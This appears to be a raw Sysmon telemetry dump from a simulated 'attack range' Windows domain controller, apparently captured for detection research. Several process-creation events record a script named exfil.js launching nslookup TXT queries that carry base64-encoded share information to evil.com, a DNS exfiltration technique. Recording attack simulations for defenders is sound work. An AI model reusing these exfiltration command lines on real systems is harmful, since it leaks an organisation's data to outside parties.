14:21:54.623{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.623{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.623{2E1864BB-1902-629A-BA46-000000005F02}54803396C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-BC46-000000005F02}2632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.630{2E1864BB-1902-629A-BC46-000000005F02}2632C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-BA46-000000005F02}5480C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltawmac.tmp 2>&1 10341000x8000000000000000216627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.586{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-BB46-000000005F02}3140C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.586{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-BB46-000000005F02}3140C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.586{2E1864BB-1902-629A-BB46-000000005F02}31407772C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-BA46-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.570{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-BB46-000000005F02}3140C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.570{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.570{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.570{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.570{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.570{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-BA46-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.555{2E1864BB-18E0-629A-6742-000000005F02}39767280C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-BA46-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.570{2E1864BB-1902-629A-BA46-000000005F02}5480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltawmac.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.555{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyality.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.523{2E1864BB-1902-629A-B846-000000005F02}59804348C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-B946-000000005F02}4232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.082{00000000-0000-0000-0000-000000000000}5440<unknown process>-udptruefalse127.0.0.1-51383-false127.0.0.1-53domain 354300x8000000000000000216613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.082{00000000-0000-0000-0000-000000000000}5440<unknown process>-udpfalsefalse127.0.0.1-51382-false127.0.0.1-53domain 354300x8000000000000000216612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.080{00000000-0000-0000-0000-000000000000}5440<unknown process>-udptruefalse127.0.0.1-51382-false127.0.0.1-53domain 354300x8000000000000000216611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.079{00000000-0000-0000-0000-000000000000}5440<unknown process>-udpfalsefalse127.0.0.1-51381-false127.0.0.1-53domain 10341000x8000000000000000216610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.508{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.508{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.508{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.508{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.508{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B946-000000005F02}4232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000216605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.079{00000000-0000-0000-0000-000000000000}5440<unknown process>-udptruefalse127.0.0.1-51381-false127.0.0.1-53domain 10341000x8000000000000000216604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.508{2E1864BB-1902-629A-B746-000000005F02}72602316C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-B946-000000005F02}4232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.520{2E1864BB-1902-629A-B946-000000005F02}4232C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-B746-000000005F02}7260C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyality.tmp 2>&1 10341000x8000000000000000216602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.486{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-B846-000000005F02}5980C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.486{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-B846-000000005F02}5980C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.470{2E1864BB-1902-629A-B846-000000005F02}59804348C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-B746-000000005F02}7260C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.455{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B846-000000005F02}5980C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.439{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B746-000000005F02}7260C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.439{2E1864BB-18E0-629A-6742-000000005F02}39766208C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-B746-000000005F02}7260C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.439{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 